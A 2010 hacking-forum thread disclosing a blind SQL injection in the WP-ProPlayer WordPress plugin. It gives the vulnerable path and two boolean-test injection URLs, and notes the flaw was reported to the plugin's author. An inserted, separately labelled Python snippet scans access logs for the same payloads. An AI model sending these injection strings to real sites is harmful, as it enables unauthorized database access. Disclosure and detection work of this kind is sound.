Topic: WP-ProPlayer Plugin Blind SQL Injection

ca0s
WP-ProPlayer Plugin Blind SQL Injection
« on: December 11, 2010, 11:09:09 pm »
<-------

   WP-ProPlayer Blind SQL Injection

   Founder: Ca0s

   Visit:
      st4ck-3rr0r.blogspot.com
      ka0-labs.org
   Shouts @
      evilzone.org
      elhacker.net
      diosdelared.com

------->
<-------

   Software: ProPlayer <= 4.7.7
   URL:
      http://wordpress.org/extend/plugins/proplayer/
      http://isagoksu.com/proplayer-wordpress-plugin/
   Vuln: Blind SQL Injection ->
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b

   Note: some servers filter ' to %27, so it won't work this way.

------->
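
A defender-side check for the requests described in the post above, as an added example that is not part of the original thread: it scans web-server access log lines for pp_playlist_id values that are not plain integers, decoding the query first so the raw ' and %27 forms are treated alike. The combined log format, the integer-only id rule and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the advisory above.
ENDPOINT = "/wp-content/plugins/proplayer/playlist-controller.php"
PARAM = "pp_playlist_id"
# Assumption: a legitimate playlist id is a plain decimal integer.
VALID_ID = re.compile(r"\d+")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_ids(log_line):
    """Return decoded pp_playlist_id values in log_line that are not integers."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith(ENDPOINT):
        return []
    # parse_qs percent-decodes and maps '+' to a space, so a raw ' and an
    # encoded %27 both arrive here as the same character.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
    return [v for v in values if not VALID_ID.fullmatch(v)]

def scan(lines):
    """Yield (client_ip, decoded_value) for every flagged request."""
    for line in lines:
        for value in suspicious_ids(line):
            yield line.split(" ", 1)[0], value

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Dec/2010:23:10:01 +0000] "GET '
    + ENDPOINT + '?pp_playlist_id=7 HTTP/1.1" 200 512',
    '198.51.100.23 - - [11/Dec/2010:23:11:40 +0000] "GET '
    + ENDPOINT + "?pp_playlist_id=7')+and+('a'='a" + ' HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Dec/2010:23:12:02 +0000] "GET '
    + ENDPOINT + '?pp_playlist_id=7%27)+and+(%27a%27=%27b HTTP/1.1" 200 0',
    '192.0.2.10 - - [11/Dec/2010:23:13:15 +0000] "GET '
    + "/index.php?s=o'brien" + ' HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-integer {PARAM}: {value!r}")
```

The same integer-only rule can be enforced at the application or WAF layer, which rejects both forms of the request regardless of how the server encodes the quote.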

ande
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #1 on: December 12, 2010, 12:06:11 am »
Vulnerability status? I couldn't find any fix notes on their site.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

ca0s
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #2 on: December 12, 2010, 12:58:06 am »
Unfixed.
I reported it to the author.

ande
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #3 on: December 12, 2010, 01:04:08 am »
> Unfixed.
> I reported it to the author.

Sweet, better hope they fix it quick :P

solar
Re: WP-ProPlayer Plugin Blind SQL Injection
« Reply #4 on: February 25, 2011, 07:24:13 pm »
Cool... nice find.